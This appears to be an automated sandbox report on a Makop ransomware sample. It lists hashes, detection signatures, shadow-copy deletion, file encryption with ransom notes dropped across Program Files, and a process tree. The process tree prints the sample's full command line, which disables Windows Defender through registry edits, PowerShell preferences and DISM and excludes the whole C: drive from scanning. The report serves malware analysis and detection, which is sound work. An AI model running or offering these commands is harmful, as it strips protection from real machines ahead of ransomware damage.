Analysis
-
max time kernel
148s -
max time network
123s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
26-12-2021 05:07
Static task
static1
Behavioral task
behavioral1
Sample
c540c9b5b467d575f46433b78237f6e1.exe
Resource
win7-en-20211208
General
-
Target
c540c9b5b467d575f46433b78237f6e1.exe
-
Size
109KB
-
MD5
c540c9b5b467d575f46433b78237f6e1
-
SHA1
93dd622dc1268f598a47fe7c75efbce355097b98
-
SHA256
5f5d1f324ed8dc18d76f200a176d40ab2ae48e336f33c2f7b5d047d682f3260a
-
SHA512
29776896e4e5eef318389c3b618afe1a1ccb83e4eb41c42bcb108576a50953d760696bcf7531331678e00284a2d0320dba553070a2e0cc3bd7896802e82c9190
Malware Config
Extracted
C:\Windows\tasks\readme-warning.txt
https://tox.chat/
Signatures
-
MAKOP ransomware payload 3 IoCs
resource yara_rule behavioral2/files/0x000300000001a436-3186.dat family_makop behavioral2/files/0x000300000001a436-3187.dat family_makop behavioral2/files/0x000300000001a436-3188.dat family_makop -
Makop
Ransomware family discovered by @VK_Intel in early 2020.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
pid Process 4172 wbadmin.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 2260 MpResult.exe 2796 SA.exe 4748 SA.exe -
Loads dropped DLL 8 IoCs
pid Process 4196 MsiExec.exe 2532 rundll32.exe 2532 rundll32.exe 2532 rundll32.exe 2532 rundll32.exe 2532 rundll32.exe 2532 rundll32.exe 2532 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: msiexec.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Density_Selected_Solid.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\sa_16x11.png SA.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\wmplayer.exe.mui SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-white\WideTile.scale-125.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-20.png SA.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache-Light.scale-240.png SA.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailLargeTile.scale-100.png SA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\SharePointPortalSite.ico SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Themes\western.mobile.jpg SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\bartlett.png SA.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\mpvis.dll.mui SA.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\de-DE.mail.config SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\StickySelection.scale-100.png SA.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7656_40x40x32.png SA.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailBadge.scale-150.png SA.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\snmp.acl.template SA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\AUTHOR.XSL SA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART7.BDR SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ZXing.winmd SA.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarBadge.scale-400.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-16_altform-unplated_contrast-black.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-black\MedTile.scale-100.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-48_altform-unplated_contrast-white.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreWideTile.scale-200.png SA.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties SA.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\np_16x11.png SA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ppd.xrm-ms SA.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main.xml SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreWideTile.scale-100.png SA.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionLargeTile.scale-150.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-black.png SA.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\DailyChallenges\LobbyTiles\Tripeaks_bp_809.jpg SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\facepalm.png SA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_OEM_Perp-ppd.xrm-ms SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\ma_16x11.png SA.exe File opened for modification C:\Program Files\7-Zip\descript.ion SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Square44x44Logo.targetsize-48.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\pk_60x42.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\spider\Entangled_.png SA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ppd.xrm-ms SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\Weather_TileMediumSquare.scale-100.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteMediumTile.scale-150.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\cn_60x42.png SA.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar SA.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar SA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_OEM_Perp-ul-oob.xrm-ms SA.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui SA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Trial-ppd.xrm-ms SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupLargeTile.scale-100.png SA.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\readme-warning.txt SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_MouseEar.png SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-30.png SA.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\Snooze.scale-80.png SA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp SA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api SA.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6584_32x32x32.png SA.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1 SA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GostName.XSL SA.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppPackageAppList.scale-125.png SA.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\tasks\SA.DAT SA.exe File created C:\Windows\tasks\readme-warning.txt SA.exe File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File created C:\Windows\tasks\MpResult.exe c540c9b5b467d575f46433b78237f6e1.exe File created C:\Windows\tasks\SA.exe c540c9b5b467d575f46433b78237f6e1.exe File created C:\Windows\tasks\0.msi c540c9b5b467d575f46433b78237f6e1.exe File opened for modification C:\Windows\tasks\0.msi SA.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4564 timeout.exe 4148 timeout.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4660 vssadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings c540c9b5b467d575f46433b78237f6e1.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 3212 powershell.exe 3212 powershell.exe 3212 powershell.exe 4912 powershell.exe 4912 powershell.exe 4912 powershell.exe 2052 powershell.exe 2052 powershell.exe 2052 powershell.exe 3748 powershell.exe 3748 powershell.exe 3748 powershell.exe 4828 powershell.exe 4828 powershell.exe 4828 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 3128 powershell.exe 3128 powershell.exe 3128 powershell.exe 4300 powershell.exe 4300 powershell.exe 4300 powershell.exe 3056 powershell.exe 3056 powershell.exe 3056 powershell.exe 2260 MpResult.exe 2260 MpResult.exe 2320 powershell.exe 2320 powershell.exe 2320 powershell.exe 4196 powershell.exe 4196 powershell.exe 4196 powershell.exe 712 powershell.exe 712 powershell.exe 712 powershell.exe 2796 SA.exe 2796 SA.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3824 c540c9b5b467d575f46433b78237f6e1.exe Token: SeDebugPrivilege 3212 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 3748 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 4696 powershell.exe Token: SeDebugPrivilege 3128 powershell.exe Token: SeDebugPrivilege 4300 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeDebugPrivilege 2260 MpResult.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeIncreaseQuotaPrivilege 2260 MpResult.exe Token: SeSecurityPrivilege 2260 MpResult.exe Token: SeTakeOwnershipPrivilege 2260 MpResult.exe Token: SeLoadDriverPrivilege 2260 MpResult.exe Token: SeSystemProfilePrivilege 2260 MpResult.exe Token: SeSystemtimePrivilege 2260 MpResult.exe Token: SeProfSingleProcessPrivilege 2260 MpResult.exe Token: SeIncBasePriorityPrivilege 2260 MpResult.exe Token: SeCreatePagefilePrivilege 2260 MpResult.exe Token: SeBackupPrivilege 2260 MpResult.exe Token: SeRestorePrivilege 2260 MpResult.exe Token: SeShutdownPrivilege 2260 MpResult.exe Token: SeDebugPrivilege 2260 MpResult.exe Token: SeSystemEnvironmentPrivilege 2260 MpResult.exe Token: SeRemoteShutdownPrivilege 2260 MpResult.exe Token: SeUndockPrivilege 2260 MpResult.exe Token: SeManageVolumePrivilege 2260 MpResult.exe Token: 33 2260 MpResult.exe Token: 34 2260 MpResult.exe Token: 35 2260 MpResult.exe Token: 36 2260 MpResult.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 712 powershell.exe Token: SeBackupPrivilege 2304 vssvc.exe Token: SeRestorePrivilege 2304 vssvc.exe Token: SeAuditPrivilege 2304 vssvc.exe Token: SeBackupPrivilege 3960 wbengine.exe Token: SeRestorePrivilege 3960 wbengine.exe Token: SeSecurityPrivilege 3960 wbengine.exe Token: SeIncreaseQuotaPrivilege 3560 WMIC.exe Token: SeSecurityPrivilege 3560 WMIC.exe Token: SeTakeOwnershipPrivilege 3560 WMIC.exe Token: SeLoadDriverPrivilege 3560 WMIC.exe Token: SeSystemProfilePrivilege 3560 WMIC.exe Token: SeSystemtimePrivilege 3560 WMIC.exe Token: SeProfSingleProcessPrivilege 3560 WMIC.exe Token: SeIncBasePriorityPrivilege 3560 WMIC.exe Token: SeCreatePagefilePrivilege 3560 WMIC.exe Token: SeBackupPrivilege 3560 WMIC.exe Token: SeRestorePrivilege 3560 WMIC.exe Token: SeShutdownPrivilege 3560 WMIC.exe Token: SeDebugPrivilege 3560 WMIC.exe Token: SeSystemEnvironmentPrivilege 3560 WMIC.exe Token: SeRemoteShutdownPrivilege 3560 WMIC.exe Token: SeUndockPrivilege 3560 WMIC.exe Token: SeManageVolumePrivilege 3560 WMIC.exe Token: 33 3560 WMIC.exe Token: 34 3560 WMIC.exe Token: 35 3560 WMIC.exe Token: 36 3560 WMIC.exe Token: SeIncreaseQuotaPrivilege 3560 WMIC.exe Token: SeSecurityPrivilege 3560 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1580 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3824 wrote to memory of 4324 3824 c540c9b5b467d575f46433b78237f6e1.exe 70 PID 3824 wrote to memory of 4324 3824 c540c9b5b467d575f46433b78237f6e1.exe 70 PID 3824 wrote to memory of 4324 3824 c540c9b5b467d575f46433b78237f6e1.exe 70 PID 4324 wrote to memory of 3920 4324 cmd.exe 72 PID 4324 wrote to memory of 3920 4324 cmd.exe 72 PID 4324 wrote to memory of 3920 4324 cmd.exe 72 PID 3920 wrote to memory of 4484 3920 cmd.exe 73 PID 3920 wrote to memory of 4484 3920 cmd.exe 73 PID 3920 wrote to memory of 4484 3920 cmd.exe 73 PID 4324 wrote to memory of 4520 4324 cmd.exe 74 PID 4324 wrote to memory of 4520 4324 cmd.exe 74 PID 4324 wrote to memory of 4520 4324 cmd.exe 74 PID 4324 wrote to memory of 3212 4324 cmd.exe 75 PID 4324 wrote to memory of 3212 4324 cmd.exe 75 PID 4324 wrote to memory of 3212 4324 cmd.exe 75 PID 4324 wrote to memory of 2976 4324 cmd.exe 76 PID 4324 wrote to memory of 2976 4324 cmd.exe 76 PID 4324 wrote to memory of 2976 4324 cmd.exe 76 PID 4324 wrote to memory of 4912 4324 cmd.exe 77 PID 4324 wrote to memory of 4912 4324 cmd.exe 77 PID 4324 wrote to memory of 4912 4324 cmd.exe 77 PID 4324 wrote to memory of 2052 4324 cmd.exe 78 PID 4324 wrote to memory of 2052 4324 cmd.exe 78 PID 4324 wrote to memory of 2052 4324 cmd.exe 78 PID 4324 wrote to memory of 3748 4324 cmd.exe 79 PID 4324 wrote to memory of 3748 4324 cmd.exe 79 PID 4324 wrote to memory of 3748 4324 cmd.exe 79 PID 4324 wrote to memory of 4828 4324 cmd.exe 80 PID 4324 wrote to memory of 4828 4324 cmd.exe 80 PID 4324 wrote to memory of 4828 4324 cmd.exe 80 PID 4324 wrote to memory of 4696 4324 cmd.exe 81 PID 4324 wrote to memory of 4696 4324 cmd.exe 81 PID 4324 wrote to memory of 4696 4324 cmd.exe 81 PID 3824 wrote to memory of 4880 3824 c540c9b5b467d575f46433b78237f6e1.exe 82 PID 3824 wrote to memory of 4880 3824 c540c9b5b467d575f46433b78237f6e1.exe 82 PID 3824 wrote to memory of 4880 3824 c540c9b5b467d575f46433b78237f6e1.exe 82 PID 4880 wrote to memory of 4564 4880 cmd.exe 84 PID 4880 wrote to memory of 4564 4880 cmd.exe 84 PID 4880 wrote to memory of 4564 4880 cmd.exe 84 PID 4324 wrote to memory of 3128 4324 cmd.exe 85 PID 4324 wrote to memory of 3128 4324 cmd.exe 85 PID 4324 wrote to memory of 3128 4324 cmd.exe 85 PID 4324 wrote to memory of 4300 4324 cmd.exe 86 PID 4324 wrote to memory of 4300 4324 cmd.exe 86 PID 4324 wrote to memory of 4300 4324 cmd.exe 86 PID 4324 wrote to memory of 3056 4324 cmd.exe 87 PID 4324 wrote to memory of 3056 4324 cmd.exe 87 PID 4324 wrote to memory of 3056 4324 cmd.exe 87 PID 3824 wrote to memory of 2260 3824 c540c9b5b467d575f46433b78237f6e1.exe 88 PID 3824 wrote to memory of 2260 3824 c540c9b5b467d575f46433b78237f6e1.exe 88 PID 3824 wrote to memory of 748 3824 c540c9b5b467d575f46433b78237f6e1.exe 90 PID 3824 wrote to memory of 748 3824 c540c9b5b467d575f46433b78237f6e1.exe 90 PID 3824 wrote to memory of 748 3824 c540c9b5b467d575f46433b78237f6e1.exe 90 PID 748 wrote to memory of 4148 748 cmd.exe 92 PID 748 wrote to memory of 4148 748 cmd.exe 92 PID 748 wrote to memory of 4148 748 cmd.exe 92 PID 2260 wrote to memory of 4072 2260 MpResult.exe 93 PID 2260 wrote to memory of 4072 2260 MpResult.exe 93 PID 4324 wrote to memory of 2320 4324 cmd.exe 94 PID 4324 wrote to memory of 2320 4324 cmd.exe 94 PID 4324 wrote to memory of 2320 4324 cmd.exe 94 PID 4324 wrote to memory of 4196 4324 cmd.exe 96 PID 4324 wrote to memory of 4196 4324 cmd.exe 96 PID 4324 wrote to memory of 4196 4324 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe"C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe"1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\SysWOW64\cmd.exe"cmd" /C cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f & reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true" & dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"2⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\SysWOW64\cmd.execmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵PID:4484
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵PID:4520
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
C:\Windows\SysWOW64\Dism.exedism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet3⤵
- Drops file in Windows directory
PID:2976
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
